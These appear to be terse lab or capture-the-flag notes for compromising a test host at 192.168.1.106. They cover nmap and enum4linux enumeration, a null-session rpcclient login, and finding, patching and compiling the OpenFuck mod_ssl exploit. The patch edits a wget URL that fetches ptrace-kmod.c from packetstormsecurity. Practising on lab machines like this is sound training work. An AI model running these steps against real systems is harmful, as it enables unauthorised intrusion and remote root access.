service enumeration and aggrasive scan
-nmap -sV -a 192.168.1.106
-enum4linux 192.168.1.106 
-to get some information about the target
-check if the target allows session using null username and nullpassword
-example IP allows using username '', password''
-rpcclient -U "" 192.168.1.106
-if openssh 2 is available than we can use 
-searchsploit openssh 2
-for ssl version <2.8.7 openfuck exploit will work just fine
-openfuckV2.c is more stable
-use cp command to copy exploits from the searchsploit to desktop 
-searchsploit OpenFuck

-we need to update it anyways 
-apt-get install libssl-dev
-apt-get install libssl1.0-dev

-include libraries
-#include <openssl/rc4.h>
-#include <openssl/md5.h>
-search wget in the file
-http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
-gcc -o OpenFuck 764.c -lcrypto
-get the apache version from zenmap
-./OpenFuck 0x6b 192.168.1.106 -c 50 